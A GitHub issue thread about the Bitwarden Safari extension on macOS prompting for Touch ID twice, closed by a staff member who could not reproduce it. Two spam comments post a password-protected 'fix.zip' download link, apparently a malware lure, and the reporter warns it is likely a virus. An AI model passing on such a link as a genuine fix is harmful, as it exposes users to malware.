### ISSUE TITLE
Mac Safari: Extension keeps asking for Touch ID

### ISSUE THREAD

**Issue by JustinGuese** [bitwarden/clients#10764]
### Steps To Reproduce

1. Open new safari window
2. Extension is locked, asks for touch id
3. confirm with Touch ID
4. asks again for Touch ID. I can even cancel it here, (click to window), click the extension button again, and it is unlocked. 

I mean it is an inconvenience, but I'd prefer that it directly opens the "unlocked status", Saving 2 clicks
It worked pre 2024, so I guess it's a bug

### Expected Result

after step 3 no repeated query for Touch ID, instead opening the unlocked status

### Actual Result

asking for Touch ID again

### Additional Context

Safari Version 17.6 (19618.3.11.11.5)
Mac OS 14.6.1 (23G93) (arm m2 chip)
Bitwarden Version 2024.7.1 (27455)

### Operating System

macOS

### Operating System Version

14.6.1 (23G93)

### Web Browser

Safari

### Browser Version

17.6 (19618.3.11.11.5)

### Build Version

2024.7.1 (27455)

### Issue Tracking Info

- [X] I understand that work is tracked outside of Github. A PR will be linked to this issue should one be opened to address it, but Bitwarden doesn't use fields like "assigned", "milestone", or "project" to track progress.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JustinGuese** [comment]
^the above is most likely a virus, don't open it if anyone reads this

**Comment by daniellbw** [comment]
Hi there,

I attempted to reproduce your issue and was unable to do so. I think your error could have its origin in a misconfiguration in your Desktop App biometric settings.

We use GitHub issues as a place to track bugs and other development related issues. If your issue persists, please write us back using our “Contact support” form located on our Help Center (https://bitwarden.com/help/).

You can include a link to this issue in the message content.

Alternatively, you can also search for an answer in our help documentation or get help from other Bitwarden users on our community forums (https://community.bitwarden.com/c/support/). 

The issue here will be closed.

Thanks!
